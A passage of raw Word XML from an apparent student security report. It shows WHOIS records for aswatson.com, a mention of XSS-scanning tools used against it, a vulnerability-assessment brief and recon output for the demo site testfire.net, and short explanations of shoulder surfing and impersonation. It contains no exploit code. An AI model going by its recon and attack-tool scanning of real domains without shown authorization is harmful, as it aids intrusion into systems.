        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Email:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>@ckh.com.hk</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shd w:fill="F0F0F0" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Bold" w:eastAsia="Arimo Bold" w:hAnsi="Arimo Bold" w:cs="Arimo Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="434343"/>
          <w:sz w:val="29"/>
          <w:shd w:fill="F0F0F0" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Raw Whois Data</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Domain Name: aswatson.com</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Registry Domain ID: 84780480_DOMAIN_COM-VRSN</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Registrar WHOIS Server: whois.corporatedomains.com</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Registrar URL: www.cscprotectsbrands.com</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Updated Date: 2022-11-14T20:25:39Z</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Creation Date: 2002-03-22T23:06:24Z</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Registrar Registration Expiration Date: 2024-03-23T03:06:24Z</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Registrar: CSC CORPORATE DOMAINS, INC.</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Sponsoring Registrar IANA ID: 299</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Registrar Abuse Contact Email: @cscglobal.com</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Registrar Abuse Contact Phone: +1.8887802723</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Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited</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Registry Registrant ID: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Registrant Name: Domain Administrator</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Registrant Organization: A.S. Watson TM Limited</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Registrant Street: Vistra Corporate Services Centre, Wickhams Cay II, Road Town</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Registrant City: Tortola</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Registrant State/Province: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Registrant Postal Code: VG1110</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Registrant Country: VG</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Registrant Phone: +852.21281188</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Registrant Phone Ext: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Registrant Fax: +852.21281705</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Registrant Fax Ext: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Registrant Email: @ckh.com.hk</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Registry Admin ID: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Admin Name: Domain Administrator</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Admin Organization: A.S. Watson TM Limited</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Admin Street: Vistra Corporate Services Centre, Wickhams Cay II, Road Town</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Admin City: Tortola</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Admin State/Province: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Admin Postal Code: VG1110</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Admin Country: VG</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Admin Phone: +852.21281188</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Admin Phone Ext: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Admin Fax: +852.21281705</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Admin Fax Ext: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Admin Email: @ckh.com.hk</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Registry Tech ID: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Name: Domain Administrator</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Organization: Watson Enterprises Limited</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Street: P.O. Box 146, Trident Chambers, Wickhams Cay</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City: Road Town</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State/Province: Tortola</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Postal Code: VG1110</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Country: VG</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Phone: +852.21281188</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Tech Phone Ext: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Fax: +852.21281705</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Tech Fax Ext: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Tech Email: @ckh.com.hk</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Name Server: a2-65.akam.net</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Name Server: a20-64.akam.net</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Name Server: a5-67.akam.net</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Name Server: a1-124.akam.net</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Name Server: a12-67.akam.net</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Name Server: a13-67.akam.net</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DNSSEC: unsigned</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URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/</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&gt;&gt;&gt; Last update of WHOIS database: 2022-11-14T20:25:39Z &lt;&lt;&lt;</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For more information on Whois status codes, please visit https://icann.org/epp</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Corporation Service Company(c) (CSC)  The Trusted Partner of More than 50% of the 100 Best Global Brands.</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Contact us to learn more about our enterprise solutions for Global Domain Name Registration and Management, Trademark Research and Watching, Brand, Logo and Auction Monitoring, as well SSL Certificate Services and DNS Hosting.</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NOTICE: You are not authorized to access or query our WHOIS database through the use of high-volume, automated, electronic processes or for the purpose or purposes of using the data in any manner that violates these terms of use. The Data in the CSC WHOIS database is provided by CSC for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. CSC does not guarantee its accuracy. By submitting a WHOIS query, you agree to abide by the following terms of use: you agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to CSC (or its computer systems). CSC reserves the right to terminate your access to the WHOIS database in its sole discretion for any violations by you of these terms of use. CSC reserves the right to modify these terms at any time.</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Register your domain name at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreCursor Regular" w:eastAsia="TeXGyreCursor Regular" w:hAnsi="TeXGyreCursor Regular" w:cs="TeXGyreCursor Regular"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "http://www.cscglobal.com"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreCursor Regular" w:eastAsia="TeXGyreCursor Regular" w:hAnsi="TeXGyreCursor Regular" w:cs="TeXGyreCursor Regular"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://www.cscglobal.com</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>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bidi w:val="false"/>
        <w:spacing w:after="300" w:before="150"/>
        <w:ind w:right="299" w:left="299"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreCursor Regular" w:eastAsia="TeXGyreCursor Regular" w:hAnsi="TeXGyreCursor Regular" w:cs="TeXGyreCursor Regular"/>
          <w:color w:val="434343"/>
          <w:sz w:val="21"/>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I have done the vulnerability test by using (owasp)zap tool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By demonstrating the manual and automated attack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I have given the drive video link here</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FF"/>
          <w:sz w:val="52"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://drive.google.com/file/d/1RhCx_Aj2lVxg0JwguJRgYQVYzBEc7VT0/view?usp=drive_link"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito Regular" w:eastAsia="Carlito Regular" w:hAnsi="Carlito Regular" w:cs="Carlito Regular"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="52"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://drive.google.com/file/d/1RhCx_Aj2lVxg0JwguJRgYQVYzBEc7VT0/view?usp=drive_link</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>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and also tested with PwnXSS</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and XSStrike</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the results were</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Thank you </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="264" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito Regular" w:eastAsia="Carlito Regular" w:hAnsi="Carlito Regular" w:cs="Carlito Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">And this was my bug bounty project </w:t>
      </w:r>
    </w:p>
    <w:p>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Heading1"/>
        <w:pBdr/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="3" w:name="_Tochqpebymj2ay1"/>
      <w:r>
        <w:rPr/>
        <w:t>Task -2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pBdr/>
        <w:spacing w:line="360" w:after="150" w:before="300"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Medium" w:eastAsia="Open Sans Medium" w:hAnsi="Open Sans Medium" w:cs="Open Sans Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="35475C"/>
          <w:sz w:val="37"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Network Vulnerability Assessment</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="4" w:name="_Toc6i0wzx00bi1t"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="484F54"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Semibold" w:eastAsia="Open Sans Semibold" w:hAnsi="Open Sans Semibold" w:cs="Open Sans Semibold"/>
          <w:color w:val="484F54"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Category: Cyber Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="484F54"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Semibold" w:eastAsia="Open Sans Semibold" w:hAnsi="Open Sans Semibold" w:cs="Open Sans Semibold"/>
          <w:color w:val="484F54"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Skills Required:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Regular" w:eastAsia="Open Sans Regular" w:hAnsi="Open Sans Regular" w:cs="Open Sans Regular"/>
          <w:color w:val="484F54"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Cyber Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Regular" w:eastAsia="Open Sans Regular" w:hAnsi="Open Sans Regular" w:cs="Open Sans Regular"/>
          <w:color w:val="484F54"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Semibold" w:eastAsia="Open Sans Semibold" w:hAnsi="Open Sans Semibold" w:cs="Open Sans Semibold"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="35475C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Project Description:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Light" w:eastAsia="Open Sans Light" w:hAnsi="Open Sans Light" w:cs="Open Sans Light"/>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>To achieve this, the first step is to identify the vulnerabilities and name them along with their associated Common Weakness Enumeration (CWE) code. Additionally, the corresponding Open Web Application Security Project (OWASP) category and description should be provided.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Light" w:eastAsia="Open Sans Light" w:hAnsi="Open Sans Light" w:cs="Open Sans Light"/>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>A thorough analysis of the potential business impact of each vulnerability is also essential. This analysis should be conducted to understand the potential consequences of each vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Light" w:eastAsia="Open Sans Light" w:hAnsi="Open Sans Light" w:cs="Open Sans Light"/>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Identifying the vulnerability path and vulnerability parameter is necessary for determining the root cause of the vulnerability and developing appropriate mitigation strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Light" w:eastAsia="Open Sans Light" w:hAnsi="Open Sans Light" w:cs="Open Sans Light"/>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Finally, the report should provide detailed instructions on how to reproduce each vulnerability. This information is crucial for developers to understand the specific steps required to fix the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Light" w:eastAsia="Open Sans Light" w:hAnsi="Open Sans Light" w:cs="Open Sans Light"/>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>To ensure that the report is comprehensive and detailed, it should be between 30 to 50 pages. By providing detailed information and analysis, the report will enable developers and stakeholders to understand the potential impact of the vulnerabilities and take appropriate action to address them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Bold" w:eastAsia="Open Sans Bold" w:hAnsi="Open Sans Bold" w:cs="Open Sans Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Source website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Light" w:eastAsia="Open Sans Light" w:hAnsi="Open Sans Light" w:cs="Open Sans Light"/>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> :- http://testfire.net/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Semibold" w:eastAsia="Open Sans Semibold" w:hAnsi="Open Sans Semibold" w:cs="Open Sans Semibold"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="35475C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5943600" cy="4917366"/>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4917366"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>Task-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pBdr/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="360" w:after="150" w:before="300"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Medium" w:eastAsia="Open Sans Medium" w:hAnsi="Open Sans Medium" w:cs="Open Sans Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="35475C"/>
          <w:sz w:val="48"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Information Gathering</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="5" w:name="_Tocydo3hnhzhirs"/>
      <w:bookmarkEnd w:id="5"/>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Whois Information :</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xml:space="preserve">| RECORD             | DATA              </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xml:space="preserve">| Name               | testfire.net      </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Registrar          | CSC Corporate Domains, Inc.</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xml:space="preserve">| Registrant Country | US                </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Creation Date      | 1999-07-23 13:52:32</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Expiration Date    | 2024-07-23 13:52:32</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Last Updated       | 2023-07-19 05:05:02</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Status             | clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited</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Status             | clientTransferProhibited https://icann.org/epp#clientTransferProhibited</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xml:space="preserve">| DNS Sec            | False             </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 xml:space="preserve">| Registrant         | Not Disclosed     </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Light" w:eastAsia="Open Sans Light" w:hAnsi="Open Sans Light" w:cs="Open Sans Light"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="35475C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>-----------------------------------------------------------------------------------------------</w:t>
      </w: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DNS Information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RECORD             | DATA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SOA Record         | asia3.akam.net. hostmaster.akamai.com. 1366025607 43200 7200 604800 86400</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A Record           | 65.61.137.117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NS Record          | usw2.akam.net.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NS Record          | ns1-206.akam.net.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NS Record          | eur5.akam.net.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NS Record          | usc2.akam.net.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NS Record          | usc3.akam.net.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NS Record          | ns1-99.akam.net.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NS Record          | asia3.akam.net.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NS Record          | eur2.akam.net.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MX Information not found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TXT Record         | "v=spf1 mx/24 -all"</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w:t>
      </w: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Subdomain Information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Subdomain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demo.testfire.net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w:t>
      </w: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Gathering Geolocation Information ..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Geolocation Information not found ..</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pP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xml:space="preserve">[+] Gathering Shodan Information .. </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Access denied (403 Forbidden)</w:t>
      </w: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 Shodan Information not found ..</w:t>
      </w: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Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="0" w:before="405"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="303133"/>
          <w:sz w:val="48"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Shoulder Surfing</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="6" w:name="_Tocusbdkfui80ip"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432" w:before="270"/>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">One easy method of information gathering is to simply look over the targets’ shoulder, known as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="349CAD"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "http://www.computerhope.com/jargon/s/shousurf.htm"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="349CAD"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>shoulder surfing</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>. Information obtained can range from user IDs, to passwords, to confidential data seen in plain text. Shoulder surfing doesn’t have to mean intrusion into the target location. You can shoulder surf anywhere people open their computer to do work. It could be such places as coffee shops, airports, public transportation, hotel restaurant/bar, or an outdoor seating area just outside the office.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="0" w:before="405"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="303133"/>
          <w:sz w:val="48"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Intrusion/Roleplay</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="7" w:name="_Toctgr6fuye4lg8"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432" w:before="270"/>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Intrusion is when the social engineer actually enters the building or property of the target in order to obtain information or as a direct form of compromise as covered under</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="349CAD"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://www.social-engineer.org/framework/attack-vectors/impersonation/"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="349CAD"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Impersonation</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>. Posing as an employee, an outside contractor, or even an IT administrator, the social engineer can ask questions or offer to fix issues either in-person or over the phone (see</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="true"/>
          <w:color w:val="349CAD"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://www.social-engineer.org/framework/influencing-others/pretexting/"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="true"/>
          <w:color w:val="349CAD"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Pretexting</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="true"/>
          <w:color w:val="349CAD"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://www.social-engineer.org/framework/influencing-others/elicitation/"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="true"/>
